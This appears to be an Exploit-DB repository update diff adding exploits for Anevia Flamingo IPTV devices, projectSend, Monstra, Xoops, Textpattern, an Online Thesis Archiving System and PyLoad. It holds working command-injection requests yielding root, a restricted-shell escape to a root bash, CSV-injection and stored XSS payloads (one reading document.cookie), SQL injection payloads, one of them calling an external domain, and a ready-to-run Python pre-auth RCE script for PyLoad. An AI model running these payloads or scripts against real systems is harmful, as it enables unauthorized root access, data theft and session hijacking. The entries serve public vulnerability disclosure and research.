DB: 2023-06-15

11 changes to exploits/shellcodes/ghdb

Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)

Online Thesis Archiving System v1.0 - Multiple-SQLi

projectSend r1605 - CSV injection

projectSend r1605 - Stored XSS

Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

exploits/hardware/remote/51514.txt

@@ -0,0 +1,60 @@
+Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
+Exploit Author: LiquidWorm
+Vendor: Ateme
+Product web page: https://www.ateme.com
+Affected version: 3.6.5
+                  Hardware revision: 1.1
+                  SoapLive 2.4.0
+                  SoapSystem 1.3.1
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: The affected device suffers from authenticated remote code
+execution vulnerability. A remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access
+with root privileges.
+
+Tested on: GNU/Linux 3.14.29 (x86_64)
+           Apache/2.2.22 (Debian)
+           PHP/5.6.0-0anevia2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5778
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
+
+
+13.04.2023
+
+--
+
+
+$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
+        <td>uid=33(www-data)</td>
+          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
+        <td>gid=33(www-data)</td>
+          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
+        <td>groups=33(www-data),6(disk),25(floppy)</td>
+          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
+
+
+---
+
+
+$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
+        <td>uid=0(root)</td>
+          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
+        <td>gid=0(root)</td>
+          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
+        <td>groups=0(root)</td>
+          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

exploits/hardware/remote/51515.txt

@@ -0,0 +1,99 @@
+Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
+Exploit Author: LiquidWorm
+Vendor: Ateme
+Product web page: https://www.ateme.com
+Affected version: 3.6.20, 3.2.9
+                  Hardware revision 1.1, 1.0
+                  SoapLive 2.4.1, 2.0.3
+                  SoapSystem 1.3.1
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: The affected device suffers from authenticated remote code
+execution vulnerability. A remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access
+with root privileges.
+
+Tested on: GNU/Linux 3.1.4 (x86_64)
+           Apache/2.2.15 (Unix)
+           mod_ssl/2.2.15
+           OpenSSL/0.9.8g
+           DAV/2
+           PHP/5.3.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5779
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php
+
+
+13.04.2023
+
+--
+
+
+> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...
+* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
+> POST /admin/time.php HTTP/1.1
+> Host: 192.168.1.1
+> User-Agent: curl/8.0.1
+> Accept: */*
+> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
+> Content-Length: 32
+> Content-Type: application/x-www-form-urlencoded
+>
+} [32 bytes data]
+100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found
+< Date: Thu, 13 Apr 2023 23:54:15 GMT
+< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
+< X-Powered-By: PHP/5.3.6
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+< Pragma: no-cache
+* Please rewind output before next send
+< Location: /admin/time.php
+< Transfer-Encoding: chunked
+< Content-Type: text/html
+<
+* Ignoring the response-body
+{ [5 bytes data]
+100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19
+* Connection #0 to host 192.168.1.1 left intact
+* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
+* Switch from POST to GET
+* Found bundle for host: 0x1de6c6321b0 [serially]
+* Re-using existing connection #0 with host 192.168.1.1
+> POST /admin/time.php HTTP/1.1
+> Host: 192.168.1.1
+> User-Agent: curl/8.0.1
+> Accept: */*
+> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
+>
+< HTTP/1.1 200 OK
+< Date: Thu, 13 Apr 2023 23:54:17 GMT
+< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
+< X-Powered-By: PHP/5.3.6
+< Expires: Thu, 19 Nov 1981 08:52:00 GMT
+< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+< Pragma: no-cache
+< Transfer-Encoding: chunked
+< Content-Type: text/html
+<
+{ [13853 bytes data]
+14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />    <----------------------<<
+14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />    <----------------------<<
+100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k
+* Connection #0 to host 192.168.1.1 left intact

exploits/hardware/remote/51516.txt

@@ -0,0 +1,198 @@
+Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
+Exploit Author: LiquidWorm
+Product web page: https://www.ateme.com
+Affected version: 3.2.9
+                  Hardware revision 1.0
+                  SoapLive 2.0.3
+
+Summary: Flamingo XL, a new modular and high-density IPTV head-end
+product for hospitality and corporate markets. Flamingo XL captures
+live TV and radio content from satellite, cable, digital terrestrial
+and analog sources before streaming it over IP networks to STBs, PCs
+or other IP-connected devices. The Flamingo XL is based upon a modular
+4U rack hardware platform that allows hospitality and corporate video
+service providers to deliver a mix of channels from various sources
+over internal IP networks.
+
+Desc: Once the admin establishes a secure shell session, she gets
+dropped into a sandboxed environment using the login binary that
+allows specific set of commands. One of those commands that can be
+exploited to escape the jailed shell is traceroute. A remote attacker
+can breakout of the restricted environment and have full root access
+to the device.
+
+Tested on: GNU/Linux 3.1.4 (x86_64)
+           Apache/2.2.15 (Unix)
+           mod_ssl/2.2.15
+           OpenSSL/0.9.8g
+           DAV/2
+           PHP/5.3.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5780
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
+
+
+13.04.2023
+
+--
+
+
+$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
+The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
+RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
+Anevia Flamingo XL
+root@192.168.1.1's password:
+Primary-XL> help
+available commands:
+  bonding
+  config
+  date
+  dns
+  enable
+  ethconfig
+  exit
+  exp
+  firewall
+  help
+  hostname
+  http
+  igmpq
+  imp
+  ipconfig
+  license
+  log
+  mail
+  passwd
+  persistent_logs
+  ping
+  reboot
+  reset
+  route
+  serial
+  settings
+  sslconfig
+  tcpdump
+  timezone
+  traceroute
+  upgrade
+  uptime
+  version
+  vlanconfig
+
+Primary-XL> tcpdump ;id
+tcpdump: illegal token: ;
+Primary-XL> id
+unknown command id
+Primary-XL> whoami
+unknown command whoami
+Primary-XL> ping ;id
+ping: ;id: Host name lookup failure
+Primary-XL> traceroute ;id
+BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
+
+Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
+        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
+        [-z pausemsecs] host [data size]
+
+trace the route ip packets follow going to "host"
+Options:
+        -F      Set the don't fragment bit
+        -I      Use ICMP ECHO instead of UDP datagrams
+        -l      Display the ttl value of the returned packet
+        -d      Set SO_DEBUG options to socket
+        -n      Print hop addresses numerically rather than symbolically
+        -r      Bypass the normal routing tables and send directly to a host
+        -v      Verbose output
+        -m max_ttl      Set the max time-to-live (max number of hops)
+        -p port#        Set the base UDP port number used in probes
+                (default is 33434)
+        -q nqueries     Set the number of probes per ``ttl'' to nqueries
+                (default is 3)
+        -s src_addr     Use the following IP address as the source address
+        -t tos  Set the type-of-service in probe packets to the following value
+                (default 0)
+        -w wait Set the time (in seconds) to wait for a response to a probe
+                (default 3 sec)
+        -g      Specify a loose source route gateway (8 maximum)
+
+uid=0(root) gid=0(root) groups=0(root)
+Primary-XL> version
+Software Revision: Anevia Flamingo XL v3.2.9
+Hardware Revision: 1.0
+(c) Anevia 2003-2012
+Primary-XL> traceroute ;sh
+...
+...
+whoami
+root
+id
+uid=0(root) gid=0(root) groups=0(root)
+ls -al
+drwxr-xr-x   19 root     root         1024 Oct  3  2022 .
+drwxr-xr-x   19 root     root         1024 Oct  3  2022 ..
+drwxr-xr-x    2 root     root         1024 Oct 21  2013 bin
+drwxrwxrwt    2 root     root           40 Oct  3  2022 cores
+drwxr-xr-x   13 root     root        27648 May 22 00:53 dev
+drwxr-xr-x    3 root     root         1024 Oct 21  2013 emul
+drwxr-xr-x   48 1000     1000         3072 Oct  3  2022 etc
+drwxr-xr-x    3 root     root         1024 Oct  3  2022 home
+drwxr-xr-x   11 root     root         3072 Oct 21  2013 lib
+lrwxrwxrwx    1 root     root           20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
+lrwxrwxrwx    1 root     root            3 Oct 21  2013 lib64 -> lib
+drwx------    2 root     root        12288 Oct 21  2013 lost+found
+drwxr-xr-x    4 root     root         1024 Oct 21  2013 mnt
+drwxrwxrwt    2 root     root           80 May 22 00:45 php_sessions
+dr-xr-xr-x  177 root     root            0 Oct  3  2022 proc
+drwxr-xr-x    4 root     root         1024 Oct 21  2013 root
+drwxr-xr-x    2 root     root         2048 Oct 21  2013 sbin
+drwxr-xr-x   12 root     root            0 Oct  3  2022 sys
+drwxrwxrwt   26 root     root         1140 May 22 01:06 tmp
+drwxr-xr-x   10 1000     1000         1024 Oct 21  2013 usr
+drwxr-xr-x   14 root     root         1024 Oct 21  2013 var
+
+ls /var/www/admin
+_img                           configuration.php              log_securemedia.php            stream_dump.php
+_lang                          cores_and_logs_management.php  login.php                      stream_services
+_lib                           dataminer_handshake.php        logout.php                     streaming.php
+_style                         dvbt.php                       logs.php                       support.php
+about.php                      dvbt_scan.php                  main.php                       template
+ajax                           export.php                     manager.php                    time.php
+alarm.php                      fileprogress.php               network.php                    toto.ts
+alarm_view.php                 firewall.php                   pear                           upload_helper.php
+authentication.php             get_config                     power.php                      uptime.php
+bridges.php                    get_enquiry_pending.php        read_settings.php              usbloader.php
+cam.php                        get_upgrade_error.php          receive_helper.php             version.php
+channel.php                    heartbeat.php                  rescrambling                   webradio.php
+channel_xl_list.php            include                        rescrambling.php               webtv
+check_state                    input.php                      resilience                     webtv.php
+class                          js                             resilience.php                 xmltv.php
+common                         license.php                    restart_service.php
+config_snmp.php                log.php                        set_oem.php
+
+python -c 'import pty; pty.spawn("/bin/bash")'
+root@Primary-XL:/# cd /usr/local/bin
+root@Primary-XL:/usr/local/bin# ls -al login
+-rwxr-xr-x    1 root     root        35896 Feb 21  2012 login
+root@Primary-XL:/usr/local/bin# cd ..
+root@Primary-XL:/usr/local# ls commands/
+bonding          firewall         mail             timezone
+config           help             passwd           traceroute
+date             hostname         persistent_logs  upgrade
+dbg-serial       http             ping             uptime
+dbg-set-oem      igmpq            route            version
+dbg-updates-log  imp              serial           vlanconfig
+dns              ipconfig         settings
+ethconfig        license          sslconfig
+exp              log              tcpdump
+root@Primary-XL:/usr/local# exit
+exit
+Primary-XL> enable
+password:
+Primary-XL# ;]

exploits/php/webapps/51517.txt

@@ -0,0 +1,19 @@
+Exploit Title: projectSend r1605 - CSV injection
+Version: r1605
+Bugs:  CSV Injection
+Technology: PHP
+Vendor URL: https://www.projectsend.org/
+Software Link: https://www.projectsend.org/
+Date of found: 11-06-2023
+Author: Mirabbas Ağalarov
+Tested on: Windows
+
+
+2. Technical Details & POC
+========================================
+Step 1. login as user
+step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
+step 3. Set name as  =calc|a!z|
+step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )
+
+payload: =calc|a!z|

exploits/php/webapps/51518.txt

@@ -0,0 +1,46 @@
+Exploit Title: projectSend r1605 - Stored XSS
+Application: projectSend
+Version: r1605
+Bugs:  Stored Xss
+Technology: PHP
+Vendor URL: https://www.projectsend.org/
+Software Link: https://www.projectsend.org/
+Date of found: 11-06-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+2. Technical Details & POC
+========================================
+
+1. Login as admin
+2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
+3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
+4. Set content as  alert("xss"); and set public
+5. And Save
+6. Go to http://localhost (logout)
+
+payload: alert("xss")
+
+POST /custom-assets-add.php HTTP/1.1
+Host: localhost
+Content-Length: 171
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/custom-assets-add.php?language=js
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
+Connection: close
+
+csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

exploits/php/webapps/51519.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
+# Date: 2023-06-13
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://monstra.org/
+# Software Link: https://monstra.org/monstra-3.0.4.zip
+# Version: 3.0.4
+# Tested : https://www.softaculous.com/softaculous/demos/Monstra
+
+
+--- Description ---
+
+1) Login admin panel and go to Pages:
+https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
+2) Click edit button and  write your payload in the Name field:
+Payload: "><script>alert(1)</script>
+3) After save change and will you see alert button
+https://demos3.softaculous.com/Monstraggybvrnbr4/

exploits/php/webapps/51520.txt

@@ -0,0 +1,17 @@
+# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-06-12
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://xoops.org/
+# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
+# Version: 2.5.10
+# Tested : https://www.softaculous.com/apps/cms/Xoops
+
+
+--- Description ---
+
+1) Login admin panel and click Image Manager , choose Add Category :
+https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
+2) Write your payload in the Category Name field and submit:
+Payload: <script>alert(1)</script>
+3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
+https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2

exploits/php/webapps/51521.txt

@@ -0,0 +1,79 @@
+## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 06.12.2023
+## Vendor: https://github.com/oretnom23
+## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The password parameter appears to be vulnerable to SQL injection
+attacks. The payload '+(select
+load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
+was submitted in the password parameter.
+This payload injects a SQL sub-query that calls MySQL's load_file
+function with a UNC file path that references a URL on an external
+domain. The application interacted with that domain, indicating that
+the injected SQL query was executed. The attacker can dump all
+information from the
+database of this system, and then he can use it for dangerous and
+malicious purposes!
+
+STATUS: HIGH-CRITICAL Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: password (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+OR NOT 1404=1404-- Eotr
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
+(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
+AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
+---
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
+
+## Time spend:
+01:15:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
+https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>

exploits/php/webapps/51523.txt

@@ -0,0 +1,196 @@
+# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2023-06-13
+# Exploit Author: tmrswrr
+# Vendor Homepage: https://textpattern.com/
+# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
+# Version: v4.8.8
+# Tested : https://release-demo.textpattern.co/
+
+
+--- Description ---
+
+
+1) Login admin page , choose Content , Articles section :
+https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
+2) Write in Excerpt field this payload  > "><script>alert(document.cookie)</script>
+3) Click My Site will you see alert button
+https://release-demo.textpattern.co/index.php?id=2
+
+
+--- Request ---
+
+POST /textpattern/index.php HTTP/2
+Host: release-demo.textpattern.co
+Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://release-demo.textpattern.co/
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
+Content-Length: 4690
+Origin: https://release-demo.textpattern.co
+Dnt: 1
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="ID"
+
+2
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="event"
+
+article
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="step"
+
+edit
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Title"
+
+hello
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Body"
+
+hello
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="textile_excerpt"
+
+1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Excerpt"
+
+"><script>alert(document.cookie)</script>
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sPosted"
+
+1686684925
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sLastMod"
+
+1686685069
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="AuthorID"
+
+managing-editor179
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="LastModID"
+
+managing-editor179
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Status"
+
+4
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Section"
+
+articles
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="override_form"
+
+article_listing
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="year"
+
+2023
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="month"
+
+06
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="day"
+
+13
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="hour"
+
+19
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="minute"
+
+35
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="second"
+
+25
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_year"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_month"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_day"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_hour"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_minute"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="exp_second"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="sExpires"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Category1"
+
+hope-for-the-future
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Category2"
+
+hope-for-the-future
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="url_title"
+
+alert1
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Keywords"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="Image"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="custom_1"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="custom_2"
+
+
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="save"
+
+Save
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="app_mode"
+
+async
+-----------------------------26516646042700398511941284351
+Content-Disposition: form-data; name="_txp_token"
+
+fb6da7f582d0606882462bc4ed72238e
+-----------------------------26516646042700398511941284351--

exploits/python/webapps/51522.py

@@ -0,0 +1,53 @@
+# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
+# Date: 06-10-2023
+# Credits: bAu @bauh0lz
+# Exploit Author: Gabriel Lima (0xGabe)
+# Vendor Homepage: https://pyload.net/
+# Software Link: https://github.com/pyload/pyload
+# Version: 0.5.0
+# Tested on: Ubuntu 20.04.6
+# CVE: CVE-2023-0297
+
+import requests, argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
+parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
+arguments = parser.parse_args()
+
+def doRequest(url):
+    try:
+        res = requests.get(url)
+        if res.status_code == 200:
+            return True
+        else:
+            return False
+
+    except requests.exceptions.RequestException as e:
+        print("[!] Maybe the host is offline :", e)
+        exit()
+
+def runExploit(url, cmd):
+    endpoint = url + '/flash/addcrypted2'
+    if " " in cmd:
+        validCommand = cmd.replace(" ", "%20")
+    else:
+        validCommand = cmd
+
+    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
+    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
+    print('[+] The exploit has be executeded in target machine. ')
+
+def main(targetUrl, Command):
+    print('[+] Check if target host is alive: ' + targetUrl)
+    alive = doRequest(targetUrl)
+    if alive == True:
+        print("[+] Host up, let's exploit! ")
+        runExploit(targetUrl,Command)
+    else:
+        print('[-] Host down! ')
+
+if(arguments.url != None and arguments.cmd != None):
+    targetUrl = arguments.url
+    Command = arguments.cmd
+    main(targetUrl, Command)

files_exploits.csv

@@ -3311,6 +3311,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23855,exploits/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,remote,hardware,,2013-01-03,2016-12-04,0,OSVDB-88921,,,,,
 21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware,,2001-12-20,2012-09-11,1,CVE-2002-0209;OSVDB-3964,,,,,https://www.securityfocus.com/bid/3964/info
 31519,exploits/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,remote,hardware,,2014-02-07,2014-02-07,1,CVE-2013-4710;OSVDB-97520,"Metasploit Framework (MSF)",,,,https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview
+51516,exploits/hardware/remote/51516.txt,"Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
+51515,exploits/hardware/remote/51515.txt,"Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
+51514,exploits/hardware/remote/51514.txt,"Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution",2023-06-14,LiquidWorm,remote,hardware,,2023-06-14,2023-06-14,0,,,,,,
 33044,exploits/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
 33045,exploits/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",remote,hardware,,2009-05-17,2014-04-27,1,CVE-2009-0961;OSVDB-55238,,,,,https://www.securityfocus.com/bid/35425/info
